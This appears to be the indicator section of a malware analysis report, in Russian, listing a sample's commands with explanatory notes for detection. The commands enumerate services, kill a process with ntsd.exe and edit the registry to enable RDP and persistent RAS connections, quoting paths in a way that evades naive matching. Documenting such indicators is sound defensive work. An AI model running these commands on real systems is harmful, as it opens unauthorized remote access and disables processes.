Техническая информация
- <SYSTEM32>\svchost.exe
- C:\tasklist.txt
- C:\tmp_3389.bat
- ClassName: '' WindowName: '<SYSTEM32>\ntsd.exe'
- '<SYSTEM32>\cmd.exe' /c tasklist/svc >>c:\tasklist.txt
- '<SYSTEM32>\tasklist.exe' /svc
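- '<SYSTEM32>\ntsd.exe' -c q -p 844
  (Примечание: 844 — идентификатор процесса в среде анализа; на других системах он будет иным, поэтому как индикатор его использовать не следует. Подключение отладчика с командой q завершает указанный процесс, так что признаком для обнаружения служит сам запуск ntsd.exe с ключами -c q -p.)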
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\cmd.exe' /c c:\tmp_3389.bat
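- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
  (Примечание: значение 1 параметра KeepRASConnections сохраняет RAS-соединения активными после выхода пользователя из системы. Пробел в пути раздела передан как `" "`, поэтому правила обнаружения, ищущие в командной строке подстроку «Windows NT», должны учитывать такую запись.)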
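- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  (Примечание: значение 0 параметра fDenyTSConnections разрешает входящие подключения к удалённому рабочему столу (RDP). Изменение этого параметра стоит отслеживать в журналах и правилах обнаружения; пробел в пути раздела здесь передан как `" "`, что нужно учитывать при сопоставлении командной строки.)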